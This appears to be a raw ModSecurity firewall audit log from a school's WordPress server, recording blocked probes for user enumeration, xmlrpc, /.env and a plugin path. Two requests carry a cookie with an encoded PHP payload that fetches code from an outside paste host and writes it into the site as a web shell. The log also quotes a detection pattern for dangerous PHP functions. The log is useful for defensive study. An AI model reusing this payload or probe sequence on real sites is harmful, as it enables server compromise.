(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8fec61b-Z-- --15979f3b-A-- [09/May/2025:13:39:16 +0700] aB2jFFoC-7ITMWTA_c-FQQAAAMo 103.236.140.4 39438 103.236.140.4 8181 --15979f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --15979f3b-C-- demo.sayHello --15979f3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --15979f3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746772756176889 4837 (- - -) Stopwatch2: 1746772756176889 4837; combined=3731, p1=478, p2=3061, p3=21, p4=23, p5=87, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15979f3b-Z-- --fdecb47d-A-- [09/May/2025:13:39:51 +0700] aB2jNy-fAO47ojYKsMoljwAAAE4 103.236.140.4 39442 103.236.140.4 8181 --fdecb47d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fdecb47d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdecb47d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746772791894794 3252 (- - -) Stopwatch2: 1746772791894794 3252; combined=1397, p1=497, p2=868, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdecb47d-Z-- --4deb7430-A-- [09/May/2025:13:39:55 +0700] aB2jOx6q_ZMebht3q15eKAAAAJc 103.236.140.4 39446 103.236.140.4 8181 --4deb7430-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4deb7430-C-- demo.sayHello --4deb7430-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4deb7430-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746772795707205 4792 (- - -) Stopwatch2: 1746772795707205 4792; combined=3736, p1=463, p2=3124, p3=16, p4=17, p5=67, sr=68, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4deb7430-Z-- --2781b82a-A-- [09/May/2025:13:47:28 +0700] aB2lAC-fAO47ojYKsMollgAAAEw 103.236.140.4 39486 103.236.140.4 8181 --2781b82a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99 Accept-Charset: utf-8 --2781b82a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2781b82a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746773248730490 792 (- - -) Stopwatch2: 1746773248730490 792; combined=311, p1=277, p2=0, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2781b82a-Z-- --39ac2116-A-- [09/May/2025:14:09:16 +0700] aB2qHFoC-7ITMWTA_c-K7QAAAMk 103.236.140.4 34086 103.236.140.4 8181 --39ac2116-B-- GET /wp-content/plugins/wp-catcher/index.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id Cookie: 14[5]=file_exists;14[7]=a1;14[12]=a123;14[14]=a2;14[19]=a3;14[21]=b123;14[26]=a4;14[28]=a5;14[33]=c123;14[35]=a6;14[40]=file_exists;14[42]=d123;14[47]=fopen;14[49]=a9;14[54]=base64_decode;14[56]=a;14[61]=a10;14[63]=e123;14[68]=abc;14[70]=kk;14[75]=base64_decode;14[77]=ddd;14[82]=a11;14[84]=g123;14[89]=a12;14[91]=a13;14[96]=.php;14[98]=a14;14[103]=a15;14[105]=i123;14[110]=w;14[112]=a17;14[117]=j123;14[119]=a18;14[124]=a;14[126]=k123;14[131]=a19;14[133]=a20;14[138]=l123;14[140]=a21;14[145]=a22;14[147]=m123;14[152]=uniqid;14[154]=a24;14[159]=n123;14[161]=a25;14[166]=a26;14[168]=o123;14[173]=a;14[175]=a27;14[180]=fwrite;14[182]=a28;14[187]=a29;14[189]=r123;14[194]=a30;14[196]=a31;14[201]=s123;14[203]=a32;14[208]=;14[210]=t123;14[215]=a35;14[217]=a;14[222]=q123;14[224]=a35;14[229]=a36;14[231]=u123;14[236]=a37;14[238]=a38;14[243]=w123;14[245]=a39;14[250]=a40;14[252]=x123;14[257]=a41;14[259]=a42;14[264]=123;14[266]=a;14[271]=a43;14[273]=y123;14[278]=a44;14[280]=a44;14[285]=z123;14[287]=a45;14[292]=a46;14[294]=1234;3=UEQ5d2FIQWdaV05vYnlBblVuaFNSWGh3Ykc5cGRDYzdJR1ozY21sMFpTaG1iM0JsYmlna1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkTGljdmQzQXRZV1J0YVc0dmF6Tk9NRWROVmtJdWNHaHdKeXduZHlzbktTeG1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z25hSFIwY0hNNkx5OXlaVzUwY25rdVkyOHZZWEYwZG5vdmNtRjNKeWtwT3lBL1BnPT0= X-Real-IP: 45.134.225.130 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.134.225.130 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, 
like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --39ac2116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39ac2116-E-- --39ac2116-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746774556699275 4034 (- - -) Stopwatch2: 1746774556699275 4034; combined=2374, p1=705, p2=1639, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39ac2116-Z-- --4158201e-A-- [09/May/2025:14:09:20 +0700] aB2qIB6q_ZMebht3q15ieQAAAJc 103.236.140.4 34164 103.236.140.4 8181 --4158201e-B-- GET /wp-content/plugins/wp-catcher/index.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id Cookie: 14[5]=file_exists;14[7]=a1;14[12]=a123;14[14]=a2;14[19]=a3;14[21]=b123;14[26]=a4;14[28]=a5;14[33]=c123;14[35]=a6;14[40]=file_exists;14[42]=d123;14[47]=fopen;14[49]=a9;14[54]=base64_decode;14[56]=a;14[61]=a10;14[63]=e123;14[68]=abc;14[70]=kk;14[75]=base64_decode;14[77]=ddd;14[82]=a11;14[84]=g123;14[89]=a12;14[91]=a13;14[96]=.php;14[98]=a14;14[103]=a15;14[105]=i123;14[110]=w;14[112]=a17;14[117]=j123;14[119]=a18;14[124]=a;14[126]=k123;14[131]=a19;14[133]=a20;14[138]=l123;14[140]=a21;14[145]=a22;14[147]=m123;14[152]=uniqid;14[154]=a24;14[159]=n123;14[161]=a25;14[166]=a26;14[168]=o123;14[173]=a;14[175]=a27;14[180]=fwrite;14[182]=a28;14[187]=a29;14[189]=r123;14[194]=a30;14[196]=a31;14[201]=s123;14[203]=a32;14[208]=;14[210]=t123;14[215]=a35;14[217]=a;14[222]=q123;14[224]=a35;14[229]=a36;14[231]=u123;14[236]=a37;14[238]=a38;14[243]=w123;14[245]=a39;14[250]=a40;14[252]=x123;14[257]=a41;14[259]=a42;14[264]=123;14[266]=a;14[271]=a43;14[273]=y123;14[278]=a44;14[280]=a44;14[285]=z123;14[287]=a45;14[292]=a46;14[294]=1234;3=UEQ5d2FIQWdaV05vYnlBblVuaFNSWGh3Ykc5cGRDYzdJR1ozY21sMFpTaG1iM0JsYmlna1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkTGljdmQzQXRZV1J0YVc0dmF6Tk9NRWROVmtJdWNHaHdKeXduZHlzbktTeG1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z25hSFIwY0hNNkx5OXlaVzUwY25rdVkyOHZZWEYwZG5vdmNtRjNKeWtwT3lBL1BnPT0= X-Real-IP: 45.134.225.130 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.134.225.130 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, 
like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --4158201e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4158201e-E-- --4158201e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746774560219753 4107 (- - -) Stopwatch2: 1746774560219753 4107; combined=2440, p1=840, p2=1568, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4158201e-Z-- --b2072037-A-- [09/May/2025:14:36:38 +0700] aB2whloC-7ITMWTA_c-TKQAAAMw 103.236.140.4 38822 103.236.140.4 8181 --b2072037-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2072037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2072037-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746776198918809 2650 (- - -) Stopwatch2: 1746776198918809 2650; combined=1455, p1=486, p2=939, p3=0, p4=0, p5=30, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2072037-Z-- --4e028e31-A-- [09/May/2025:14:36:44 +0700] aB2wjC-fAO47ojYKsMoz9gAAAE4 103.236.140.4 38948 103.236.140.4 8181 --4e028e31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e028e31-C-- demo.sayHello --4e028e31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e028e31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746776204885234 5638 (- - -) Stopwatch2: 1746776204885234 5638; combined=4345, p1=528, p2=3546, p3=62, p4=40, p5=99, sr=71, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e028e31-Z-- --15c99a03-A-- [09/May/2025:14:36:46 +0700] aB2wjloC-7ITMWTA_c-TRgAAAMk 103.236.140.4 38976 103.236.140.4 8181 --15c99a03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15c99a03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15c99a03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746776206382291 3344 (- - -) Stopwatch2: 1746776206382291 3344; combined=1472, p1=476, p2=965, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15c99a03-Z-- --687ec91b-A-- [09/May/2025:14:36:51 +0700] aB2wky-fAO47ojYKsMoz_QAAAEQ 103.236.140.4 39102 103.236.140.4 8181 --687ec91b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --687ec91b-C-- demo.sayHello --687ec91b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --687ec91b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746776211510796 6187 (- - -) Stopwatch2: 1746776211510796 6187; combined=4549, p1=633, p2=3685, p3=33, p4=36, p5=95, sr=125, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --687ec91b-Z-- --8f1c7276-A-- [09/May/2025:15:07:58 +0700] aB233loC-7ITMWTA_c-dEQAAAMg 103.236.140.4 51784 103.236.140.4 8181 --8f1c7276-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f1c7276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1c7276-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778078630814 2763 (- - -) Stopwatch2: 1746778078630814 2763; combined=1291, p1=432, p2=768, p3=0, p4=0, p5=91, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1c7276-Z-- --991c2810-A-- [09/May/2025:15:08:03 +0700] aB234y-fAO47ojYKsMo6-wAAAEc 103.236.140.4 52152 103.236.140.4 8181 --991c2810-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --991c2810-C-- demo.sayHello --991c2810-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --991c2810-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746778083690167 6239 (- - -) Stopwatch2: 1746778083690167 6239; combined=4898, p1=614, p2=4037, p3=42, p4=45, p5=99, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991c2810-Z-- --ff17e65c-A-- [09/May/2025:15:10:14 +0700] aB24ZlqQ1nOVx9fWpZTxbwAAAA0 103.236.140.4 33178 103.236.140.4 8181 --ff17e65c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.149.195.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.149.195.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff17e65c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff17e65c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778214457816 2675 (- - -) Stopwatch2: 1746778214457816 2675; combined=1021, p1=342, p2=652, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff17e65c-Z-- --2e8d3b11-A-- [09/May/2025:15:16:09 +0700] aB25yR6q_ZMebht3q152-gAAAJc 103.236.140.4 59278 103.236.140.4 8181 --2e8d3b11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e8d3b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e8d3b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746778569309451 2479 (- - -) Stopwatch2: 1746778569309451 2479; combined=1119, p1=364, p2=725, p3=0, p4=0, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
